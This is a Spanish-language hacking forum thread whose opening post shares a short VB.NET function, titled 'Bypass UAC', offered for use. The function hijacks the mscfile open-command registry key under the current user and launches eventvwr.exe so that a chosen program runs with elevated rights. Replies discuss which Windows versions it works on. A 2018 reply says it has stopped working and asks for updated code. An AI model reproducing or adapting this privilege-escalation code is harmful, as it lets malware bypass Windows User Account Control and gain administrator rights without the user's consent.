[VB.NET] Bypass UAC

Iniciado por fudmario, Noviembre 04, 2016, 12:59:52 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Noviembre 04, 2016, 12:59:52 AM Ultima modificación: Noviembre 08, 2016, 02:38:33 PM por fudmario
Código: vbnet

Public Sub Bypass_UAC(ByVal filepath As String)
            'Based: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
            Using regkey As RegistryKey = Registry.CurrentUser.CreateSubKey("Software\Classes\mscfile\shell\open\command")
                regkey.SetValue("", filepath, RegistryValueKind.String)
            End Using
            Process.Start("eventvwr.exe")
        End Sub



Update:
Change : OpenSubKey ---> CreateSubKey


Noviembre 04, 2016, 08:54:50 AM #1
HOLA!!!

Esto realmente funciona? para que SOs?

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scouts Team*                                                You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Noviembre 04, 2016, 11:37:38 AM #2
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Esto realmente funciona? para que SOs?

CitarThis technique has been tested on Windows 7 and Windows 10, but is expected to work on all versions of Windows that implement UAC.

fuente:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos
Noviembre 04, 2016, 12:06:16 PM #3
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
HOLA!!!

Esto realmente funciona? para que SOs?

GRACIAS POR LEER!!!
Win7, Win8, Win8.1 y Win10 (x86 - x64).
Aunque si se modifica el Control de Cuentas de Usuario se puede bloquear esto.


Noviembre 04, 2016, 01:13:52 PM #4
Si, si funciona, es mas, esto se le notifico a microsoft ( como pone en el blog de enigma) y no parece que les importe demasiado.

Gracias por la implementacion
Mi blog: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Si necesitas ayuda, no dudes en mandar MP
Febrero 03, 2018, 05:15:59 PM #5

unfortunately this method does not work anymore  >:(. is there any updated system?
maybe an example code would be ideal
Imprimir
Ir Arriba Páginas1
Acciones del Usuario